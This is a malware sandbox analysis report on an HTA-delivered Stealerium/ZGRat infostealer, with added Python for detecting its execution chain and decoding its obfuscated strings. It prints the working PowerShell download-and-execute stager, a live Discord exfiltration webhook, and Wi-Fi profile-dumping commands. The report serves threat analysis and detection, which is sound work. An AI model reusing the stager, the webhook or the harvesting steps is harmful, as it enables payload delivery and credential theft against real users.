Overview

Static analysis: score 10

Behavioral tasks (score, sample as shown in the report, platform):
  3   magic.pois...lk.dat   windows10-2004-x64
  3   magic.pois...ed.exe   windows10-2004-x64
  10  magic.pois...pt.exe   windows10-2004-x64
  10  magic.pois...cs.hta   windows10-2004-x64
  10  magic.pois...nt.pdf   windows10-2004-x64
  1   magic.pois...zg.wav   windows10-2004-x64
  6   magic.pois...pt.exe   windows10-2004-x64
  10  magic.pois...pt.exe   windows10-2004-x64
  10  magic.pois...es.hta   windows10-2004-x64
  10  magic.pois...im.vdf   windows10-2004-x64
  3   magic.pois...ck.wav   windows10-2004-x64
  1   magic.pois...ff.dat   windows10-2004-x64
  3   magic.pois...IB.pdf   windows10-2004-x64
  1   magic.pois...pt.exe   windows10-2004-x64
  10  magic.pois...ty.wav   windows10-2004-x64
  1   magic.pois...ye.wav   windows10-2004-x64
  6   magic.pois...er.exe   windows10-2004-x64
  10  magic.pois...vw.mp4   windows10-2004-x64
  6   magic.pois...op.mp4   windows10-2004-x64
  6   magic.pois...ed.hta   windows10-2004-x64
  10  magic.pois...ng.exe   windows10-2004-x64
  10  magic.pois...wn.png   windows10-2004-x64
  3   magic.pois...ox.hta   windows10-2004-x64
  10  magic.pois...xw.exe   windows10-2004-x64
  10  magic.pois...xw.hta   windows10-2004-x64
  10  magic.pois...pt.exe   windows10-2004-x64
Analysis (score 10)
- max time kernel: 150s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 19-01-2024 20:19
Tasks (task, sample, resource)
  static1        (static analysis)
  behavioral1    magic.poisontoolz.com/Avjteuhlk.dat     win10v2004-20231215-en
  behavioral2    magic.poisontoolz.com/Binded.exe        win10v2004-20231215-en
  behavioral3    magic.poisontoolz.com/Buildcrypt.exe    win10v2004-20231215-en
  behavioral4    magic.poisontoolz.com/Docs.hta          win10v2004-20231215-en
  behavioral5    magic.poisontoolz.com/Document.pdf      win10v2004-20231215-en
  behavioral6    magic.poisontoolz.com/Evllmzg.wav       win10v2004-20231215-en
  behavioral7    magic.poisontoolz.com/File1crypt.exe    win10v2004-20231215-en
  behavioral8    magic.poisontoolz.com/File2crypt.exe    win10v2004-20231215-en
  behavioral9    magic.poisontoolz.com/Files.hta         win10v2004-20231215-en
  behavioral10   magic.poisontoolz.com/Jafxaspdhim.vdf   win10v2004-20231215-en
  behavioral11   magic.poisontoolz.com/Otcck.wav         win10v2004-20231222-en
  behavioral12   magic.poisontoolz.com/Pphucxdmff.dat    win10v2004-20231222-en
  behavioral13   magic.poisontoolz.com/RIB.pdf           win10v2004-20231215-en
  behavioral14   magic.poisontoolz.com/RagCrypt.exe      win10v2004-20231222-en
  behavioral15   magic.poisontoolz.com/Spaufgty.wav      win10v2004-20231222-en
  behavioral16   magic.poisontoolz.com/Utsxokye.wav      win10v2004-20231215-en
  behavioral17   magic.poisontoolz.com/Walter.exe        win10v2004-20231215-en
  behavioral18   magic.poisontoolz.com/Wjwxkhbvw.mp4     win10v2004-20231215-en
  behavioral19   magic.poisontoolz.com/Wlkubkwdmop.mp4   win10v2004-20231215-en
  behavioral20   magic.poisontoolz.com/binded.hta        win10v2004-20231215-en
  behavioral21   magic.poisontoolz.com/building.exe      win10v2004-20231215-en
  behavioral22   magic.poisontoolz.com/down.png          win10v2004-20231215-en
  behavioral23   magic.poisontoolz.com/fox.hta           win10v2004-20231215-en
  behavioral24   magic.poisontoolz.com/xw.exe            win10v2004-20231215-en
  behavioral25   magic.poisontoolz.com/xw.hta            win10v2004-20231215-en
General
- Target: magic.poisontoolz.com/xw.hta
- Size: 9KB
- MD5: 7fd67141143ee183f9fddde7fc7e02de
- SHA1: bb658b3ec2437bd8ec9600e726433139aae85e3d
- SHA256: f29e50d354f1449c3cfc01c31f14268a29ef70051041bc14b6b71b94bce5b517
- SHA512: baded976e98ea76b9813128dc1947abae8c915fdeeb6619dff2bc88efcb31e1ee291494faa2405caa283ba6268101622932b569be02e0172b4c4a69481375ae5
- SSDEEP: 192:uIBkEA+PkPeI19n1dNDQ9nNNsV2OilDQ9nysHSUlDvdltdEVqQKdDp4Re1JQ/ffs:u20oc1C+nQrzk
Malware Config

Extracted (stealerium)
- Discord webhook: https://discordapp.com/api/webhooks/1197850806213431377/-zU9uA2NeaYEk4-ozdhgmNljI6NS_w_qcT_cbtxYxZdkUD3JeaKChZp4GXdod-MX3D1Q
Signatures

Detect ZGRat V1 (34 IoCs)
  YARA rule family_zgrat_v1 matched the following memory dumps of PID 1012 (xw.exe) in behavioral25:
  - behavioral25/memory/1012-43-0x0000000008140000-0x00000000086A8000-memory.dmp
  - behavioral25/memory/1012-N-0x0000000008140000-0x00000000086A3000-memory.dmp for N = 44, 45 and every odd value from 47 to 107 (33 dumps)

Stealerium
  An open-source info stealer written in C#, first seen in May 2022.

Blocklisted process makes network request (1 IoC)
  flow 17, PID 4284, powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry, likely for geofencing.
  - Key value queried: \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation (mshta.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation (xw.exe)

Drops startup file (2 IoCs)
  - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe (loaderX.exe)
  - File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe (loaderX.exe)

Executes dropped EXE (6 IoCs)
  PID 1012 xw.exe, PID 1756 xw.exe, PID 2720 xw.exe, PID 3080 xw.exe, PID 3732 loaderX.exe, PID 3144 build.exe

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  - Key opened: \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (build.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (build.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (build.exe)

Suspicious use of SetThreadContext (1 IoC)
  PID 1012 (xw.exe) set the thread context of PID 3080 (xw.exe). Read together with the eight WriteProcessMemory calls from 1012 into 3080 listed below, this is the write-then-SetThreadContext sequence characteristic of process hollowing: the second xw.exe instance is a host for injected code, not a plain re-execution.

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandbox environments.
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier (build.exe)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 (build.exe)

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID 4284 powershell.exe (2 hits), PID 1012 xw.exe (4 hits), PID 3144 build.exe (58 hits)

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  - SeDebugPrivilege: PID 4284 powershell.exe
  - SeDebugPrivilege: PID 1012 xw.exe
  - SeDebugPrivilege: PID 3732 loaderX.exe
  - SeDebugPrivilege: PID 3144 build.exe
  - SeSecurityPrivilege: PID 4040 msiexec.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  PID 3144 build.exe

Suspicious use of WriteProcessMemory (46 IoCs)
  source PID (process) -> target PID (process): number of writes recorded
  - 1988 mshta.exe -> 4284 powershell.exe: 3
  - 4284 powershell.exe -> 1012 xw.exe: 3
  - 1012 xw.exe -> 1756 xw.exe: 3
  - 1012 xw.exe -> 2720 xw.exe: 3
  - 1012 xw.exe -> 3080 xw.exe: 8
  - 3080 xw.exe -> 3732 loaderX.exe: 2
  - 3080 xw.exe -> 3144 build.exe: 3
  - 3144 build.exe -> 1132 cmd.exe: 3
  - 1132 cmd.exe -> 4028 chcp.com: 3
  - 1132 cmd.exe -> 4780 netsh.exe: 3
  - 1132 cmd.exe -> 4936 findstr.exe: 3
  - 3144 build.exe -> 348 cmd.exe: 3
  - 348 cmd.exe -> 2812 chcp.com: 3
  - 348 cmd.exe -> 4464 netsh.exe: 3

outlook_office_path (1 IoC)
  Key opened: \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (build.exe)

outlook_win_path (1 IoC)
  Key opened: \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (build.exe)
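The signatures above record a chain that a detection engineer can turn into host-based rules: mshta.exe writing into and launching powershell.exe, PowerShell executing a dropped binary from %AppData%, loaderX.exe dropping "Microsoft Windows Update.exe" into the Startup folder, and build.exe running cmd.exe /C chcp 65001 && netsh wlan show ... to dump saved Wi-Fi profiles and nearby networks. The Python below is an added example, not part of the sandbox report: it runs four such rules over constructed process-creation and file-creation records modelled on this report (PIDs, images and command lines are taken from it; the event schema, the rule names and the benign explorer.exe -> cmd.exe control event are the example's own assumptions).

```python
"""Detection logic for the execution chain recorded in this report.

Added example, not part of the sandbox report. EVENTS is constructed to mirror
the report's process tree and signatures (PIDs, images and command lines copied
from it); the event schema, rule names and the benign control are assumptions.
"""
import re
from typing import Dict, List, Tuple

# Paths a standard user can write to. A process image (or parent image) under
# such a path is a stronger signal than a suspicious command line on its own.
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\", re.IGNORECASE)
# The two Wi-Fi dumps build.exe ran through cmd.exe in the report.
WLAN_DUMP = re.compile(r"netsh\s+wlan\s+show\s+(profile|networks)", re.IGNORECASE)
# The per-user Startup folder loaderX.exe wrote to.
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)

EVENTS: List[Dict] = [
    {"type": "process", "pid": 1988, "ppid": 0,
     "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r'C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.hta"'},
    {"type": "process", "pid": 4284, "ppid": 1988,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTkshkQ(...)'},
    {"type": "process", "pid": 1012, "ppid": 4284,
     "image": r"C:\Users\Admin\AppData\Roaming\xw.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\xw.exe"'},
    {"type": "process", "pid": 3080, "ppid": 1012,
     "image": r"C:\Users\Admin\AppData\Roaming\xw.exe",
     "cmdline": r"C:\Users\Admin\AppData\Roaming\xw.exe"},
    {"type": "process", "pid": 3732, "ppid": 3080,
     "image": r"C:\Users\Admin\AppData\Local\Temp\loaderX.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\loaderX.exe"'},
    {"type": "process", "pid": 3144, "ppid": 3080,
     "image": r"C:\Users\Admin\AppData\Local\Temp\build.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\build.exe"'},
    {"type": "process", "pid": 1132, "ppid": 3144,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'},
    {"type": "process", "pid": 348, "ppid": 3144,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid'},
    {"type": "file_create", "pid": 3732,
     "path": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe"},
    # Constructed benign control (not from the report): an administrator runs the
    # same netsh command from a shell launched by explorer.exe. It must not alert.
    {"type": "process", "pid": 4000, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 5000, "ppid": 4000,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /C netsh wlan show profile"},
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs for every record matching one of four rules:
    HTA -> PowerShell, PowerShell launching a binary from a user-writable path,
    a Wi-Fi profile dump whose parent is a user-writable binary, and a
    Startup-folder drop by a user-writable binary."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts: List[Tuple[str, int]] = []
    for e in events:
        if e["type"] == "process":
            parent = procs.get(e["ppid"])
            parent_image = parent["image"] if parent else ""
            if _basename(e["image"]) == "powershell.exe" and _basename(parent_image) == "mshta.exe":
                alerts.append(("hta_to_powershell", e["pid"]))
            if _basename(parent_image) == "powershell.exe" and USER_WRITABLE.match(e["image"]):
                alerts.append(("dropped_exe_from_powershell", e["pid"]))
            if WLAN_DUMP.search(e["cmdline"]) and USER_WRITABLE.match(parent_image):
                alerts.append(("wifi_profile_harvest", e["pid"]))
        elif e["type"] == "file_create":
            writer = procs.get(e["pid"])
            if writer and STARTUP_DIR.search(e["path"]) and USER_WRITABLE.match(writer["image"]):
                alerts.append(("startup_persistence", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: PID {pid}")
```

The parent-image condition is what keeps the netsh rule from firing on an administrator's own netsh wlan show profile (the constructed explorer.exe -> cmd.exe control), so the rule's precision depends on the sensor supplying parent-process data; without it, fall back to alerting on the chcp 65001 && netsh wlan show pairing, which interactive users rarely type.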
Processes

C:\Windows\SysWOW64\mshta.exe  (PID 1988, level 1)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 4284, level 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTkshkQ($cDGZfk, $yzmbgckKGbazEIn){[IO.File]::WriteAllBytes($cDGZfk, $yzmbgckKGbazEIn)};function TkuLTlapXaFtTtwV($cDGZfk){if($cDGZfk.EndsWith((iyCVHkkuB @(46364,46418,46426,46426))) -eq $True){rundll32.exe $cDGZfk }elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46430,46433,46367))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $cDGZfk}elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46427,46433,46423))) -eq $True){misexec /qn /i $cDGZfk}else{Start-Process $cDGZfk}};function DTKsKtcccITMNLzYJ($OBbjRQJFrABngjzzKQR){$QxNgcQqldJUnDwxVjTSlD = New-Object (iyCVHkkuB @(46396,46419,46434,46364,46405,46419,46416,46385,46426,46423,46419,46428,46434));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yzmbgckKGbazEIn = $QxNgcQqldJUnDwxVjTSlD.DownloadData($OBbjRQJFrABngjzzKQR);return $yzmbgckKGbazEIn};function iyCVHkkuB($BmSsapwYTMD){$uhHMB=46318;$UzSaffw=$Null;foreach($WNyqiOQgreOPKu in $BmSsapwYTMD){$UzSaffw+=[char]($WNyqiOQgreOPKu-$uhHMB)};return $UzSaffw};function nBauMKwRs(){$WplUOTzLXWqwfc = $env:AppData + '\';$flgGVgp = $WplUOTzLXWqwfc + 'xw.exe'; if (Test-Path -Path $flgGVgp){TkuLTlapXaFtTtwV $flgGVgp;}Else{ $hkhkBA = DTKsKtcccITMNLzYJ (iyCVHkkuB @(46422,46434,46434,46430,46433,46376,46365,46365,46427,46415,46421,46423,46417,46364,46430,46429,46423,46433,46429,46428,46434,46429,46429,46426,46440,46364,46417,46429,46427,46365,46438,46437,46364,46419,46438,46419));QTkshkQ $flgGVgp $hkhkBA;TkuLTlapXaFtTtwV $flgGVgp;};;;;}nBauMKwRs;
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Note: the stager's strings are integer arrays rebuilt by iyCVHkkuB (each element minus 46318 is one character code). The stager downloads a payload to $env:AppData\xw.exe and launches it by extension; its .msi branch calls "misexec" (sic), which is not a Windows binary, so that branch would fail if ever reached.

    C:\Users\Admin\AppData\Roaming\xw.exe  (PID 1012, level 3)
      Command line: "C:\Users\Admin\AppData\Roaming\xw.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Roaming\xw.exe  (PID 3080, level 4)
        Command line: C:\Users\Admin\AppData\Roaming\xw.exe
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\loaderX.exe  (PID 3732, level 5)
          Command line: "C:\Users\Admin\AppData\Local\Temp\loaderX.exe"
          - Drops startup file
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken

        C:\Users\Admin\AppData\Local\Temp\build.exe  (PID 3144, level 5)
          Command line: "C:\Users\Admin\AppData\Local\Temp\build.exe"
          - Executes dropped EXE
          - Accesses Microsoft Outlook profiles
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
          - outlook_office_path
          - outlook_win_path
          Note: the two cmd.exe children below are the stealer's Wi-Fi collection. chcp 65001 switches the console to UTF-8 before the output is read; netsh wlan show profile lists the saved Wi-Fi profiles and netsh wlan show networks mode=bssid lists access points in range.

          C:\Windows\SysWOW64\cmd.exe  (PID 1132, level 6)
            Command line: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\chcp.com  (PID 4028, level 7)
              Command line: chcp 65001
            C:\Windows\SysWOW64\findstr.exe  (PID 4936, level 7)
              Command line: findstr All
            C:\Windows\SysWOW64\netsh.exe  (PID 4780, level 7)
              Command line: netsh wlan show profile

          C:\Windows\SysWOW64\cmd.exe  (PID 348, level 6)
            Command line: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
            - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\netsh.exe  (PID 4464, level 7)
              Command line: netsh wlan show networks mode=bssid
            C:\Windows\SysWOW64\chcp.com  (PID 2812, level 7)
              Command line: chcp 65001

      C:\Users\Admin\AppData\Roaming\xw.exe  (PID 2720, level 4)
        Command line: C:\Users\Admin\AppData\Roaming\xw.exe
        - Executes dropped EXE

      C:\Users\Admin\AppData\Roaming\xw.exe  (PID 1756, level 4)
        Command line: C:\Users\Admin\AppData\Roaming\xw.exe
        - Executes dropped EXE

C:\Windows\system32\msiexec.exe  (PID 4040, level 1)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Suspicious use of AdjustPrivilegeToken
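The PowerShell stager that mshta.exe launched (PID 4284 above) hides every string as an array of integers and rebuilds it with iyCVHkkuB, which subtracts the constant 46318 from each element and casts the result to a char. The Python below is an added example, not part of the sandbox report or of the sample: it takes an excerpt of the recorded command line (copied verbatim from the tree above), locates the decoding constant by finding the variable subtracted inside [char](...), extracts every @(...) array, and decodes them. The Python function names (decode, recover_offset, decode_all, payload_url) are the example's own.

```python
"""Decoder for the integer-array string obfuscation used by the PowerShell
stager recorded in this report (function iyCVHkkuB in PID 4284's command line).

Added example, not part of the sandbox report. STAGER_EXCERPT is copied
verbatim from the recorded command line; the decoding rule (element minus a
constant is a character code) is read from the script itself.
"""
import re
from typing import Iterable, List, Optional

STAGER_EXCERPT = (
    "function TkuLTlapXaFtTtwV($cDGZfk){if($cDGZfk.EndsWith((iyCVHkkuB @(46364,46418,46426,46426)))"
    " -eq $True){rundll32.exe $cDGZfk }elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46430,46433,46367)))"
    " -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $cDGZfk}elseif($cDGZfk.EndsWith("
    "(iyCVHkkuB @(46364,46427,46433,46423))) -eq $True){misexec /qn /i $cDGZfk}else{Start-Process $cDGZfk}};"
    "function DTKsKtcccITMNLzYJ($OBbjRQJFrABngjzzKQR){$QxNgcQqldJUnDwxVjTSlD = New-Object (iyCVHkkuB "
    "@(46396,46419,46434,46364,46405,46419,46416,46385,46426,46423,46419,46428,46434));"
    "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;"
    "$yzmbgckKGbazEIn = $QxNgcQqldJUnDwxVjTSlD.DownloadData($OBbjRQJFrABngjzzKQR);return $yzmbgckKGbazEIn};"
    "function iyCVHkkuB($BmSsapwYTMD){$uhHMB=46318;$UzSaffw=$Null;foreach($WNyqiOQgreOPKu in $BmSsapwYTMD)"
    "{$UzSaffw+=[char]($WNyqiOQgreOPKu-$uhHMB)};return $UzSaffw};"
    "function nBauMKwRs(){$WplUOTzLXWqwfc = $env:AppData + '\\';$flgGVgp = $WplUOTzLXWqwfc + 'xw.exe';"
    " if (Test-Path -Path $flgGVgp){TkuLTlapXaFtTtwV $flgGVgp;}Else{ $hkhkBA = DTKsKtcccITMNLzYJ (iyCVHkkuB "
    "@(46422,46434,46434,46430,46433,46376,46365,46365,46427,46415,46421,46423,46417,46364,46430,46429,46423,"
    "46433,46429,46428,46434,46429,46429,46426,46440,46364,46417,46429,46427,46365,46438,46437,46364,46419,"
    "46438,46419));QTkshkQ $flgGVgp $hkhkBA;TkuLTlapXaFtTtwV $flgGVgp;};;;;}nBauMKwRs;"
)

# Every PowerShell integer array literal: @(n1,n2,...)
ARRAY_RE = re.compile(r"@\(((?:\d+,)*\d+)\)")
# The subtraction inside [char](...) names the constant's variable.
CHAR_SUB_RE = re.compile(r"\[char\]\(\$\w+\s*-\s*\$(\w+)\)")


def decode(values: Iterable[int], offset: int) -> str:
    """Reverse the stager's encoding: each element minus the offset is a char code."""
    return "".join(chr(v - offset) for v in values)


def recover_offset(script: str) -> Optional[int]:
    """Read the decoding constant out of the script instead of hard-coding 46318,
    so re-obfuscated variants that only change the constant still decode."""
    m = CHAR_SUB_RE.search(script)
    if not m:
        return None
    assign = re.search(r"\$" + re.escape(m.group(1)) + r"\s*=\s*(\d+)", script)
    return int(assign.group(1)) if assign else None


def decode_all(script: str) -> List[str]:
    """Decode every array literal in the script, in order of appearance."""
    offset = recover_offset(script)
    if offset is None:
        raise ValueError("could not locate the decoding constant")
    return [decode(map(int, m.group(1).split(",")), offset) for m in ARRAY_RE.finditer(script)]


def payload_url(script: str) -> Optional[str]:
    """The first decoded string that is a URL, i.e. the second-stage download."""
    return next((s for s in decode_all(script) if s.lower().startswith(("http://", "https://"))), None)


if __name__ == "__main__":
    print("offset:", recover_offset(STAGER_EXCERPT))
    for s in decode_all(STAGER_EXCERPT):
        print(repr(s))
```

Decoded in order, the arrays give the three extension checks (.dll, .ps1, .msi), the type name Net.WebClient passed to New-Object, and the download URL https://magic.poisontoolz.com/xw.exe, which is the file the stager writes to $env:AppData\xw.exe and launches (C:\Users\Admin\AppData\Roaming\xw.exe, PID 1012 in the tree). Because the constant and the arrays are both read from the script, the same decoder works on samples from this kit that rename the functions or change the offset but keep the structure.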
Network
MITRE ATT&CK Enterprise v15
Downloads
Files written during the run. The paths under C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\ are the stealer's local staging directory (a per-host folder of the form user@host_locale) into which it writes the collected data before exfiltration. Entries without a path are listed as recorded.

- C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Browsers\Firefox\Bookmarks.txt
  Filesize: 105B
  MD5: 2e9d094dda5cdc3ce6519f75943a4ff4
  SHA1: 5d989b4ac8b699781681fe75ed9ef98191a5096c
  SHA256: c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
  SHA512: d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

- C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\OneDrive.txt
  Filesize: 25B
  MD5: 966247eb3ee749e21597d73c4176bd52
  SHA1: 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
  SHA256: 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
  SHA512: bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

- C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\Videos.txt
  Filesize: 23B
  MD5: 1fddbf1169b6c75898b86e7e24bc7c1f
  SHA1: d2091060cb5191ff70eb99c0088c182e80c20f8c
  SHA256: a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
  SHA512: 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

- (path not recorded)
  Filesize: 5KB
  MD5: b1d58554f33c991f9454f81bf1f6a7a6
  SHA1: 1a9c0748fbb4c4974315f6a3188ffb5078372de1
  SHA256: 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
  SHA512: ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

- (path not recorded)
  Filesize: 1007B
  MD5: 894a0706eaf89a7b68175d7da206a8b3
  SHA1: 50cb6c62493034303e4d35aef1e0c45d5dd2e102
  SHA256: ce03ca4421eaf1c1b578af11d74efd3d5d4198860e209ae4929f722cf2601f18
  SHA512: 1a06886bea0f2700b1a6d0d64f3d2cadf8b49ec1300b93dde40d50da2e563f9ec3ea4df446faf6462b95b375dc35a9ac8f71816eb06c96a9b7fea91817667924

- C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Process.txt
  Filesize: 4KB
  MD5: d162920ec27ea267235b5216d6701181
  SHA1: ef91540d216bead782f55da51239c2682dc7b71d
  SHA256: c3f4acbecdd4feb212db3fac658cb531876ae23929b76cb49d35285409a224fd
  SHA512: 7e671cbc520856770e202e379979db04665b69c770ee984c36f5f2e5bb7a5c110400f7db99164f50c88762f141a104e769493b8765a9148108f750a0ba1567a4

- C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\ProductKey.txt
  Filesize: 29B
  MD5: 71eb5479298c7afc6d126fa04d2a9bde
  SHA1: a9b3d5505cf9f84bb6c2be2acece53cb40075113
  SHA256: f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
  SHA512: 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

- (path not recorded)
  Filesize: 19B
  MD5: 0195e3cc8225740a42592efa8bf12f60
  SHA1: d4317e1f9762572ea061de3e2639f74cd2a941be
  SHA256: 0aeb189d6afa7545e36f66de5c3bd66f6ee12742d77168605c78588e9eebb1db
  SHA512: 8681594da21e812625a02322f0996f140b28f8554ae04cf9eb79723fb2c114e6bf8b4a1c42616254dfd709d3faf15924d344bfec840dd8121e9873d7f6e45173

- (path and size not recorded; these are the digests of an empty file)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

- (path not recorded)
  Filesize: 234B
  MD5: 6be6fdca0cfa94635b8689b2b0bf2bee
  SHA1: 379c61029b5443c3d3df7c770423e40618b36d15
  SHA256: 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb
  SHA512: 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8

- (path not recorded)
  Filesize: 234B
  MD5: 412ec159e4b14be1ca93db473e80acc2
  SHA1: 8909b6f7fc8715a749270b6ceb8f05f823f59fd3
  SHA256: eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
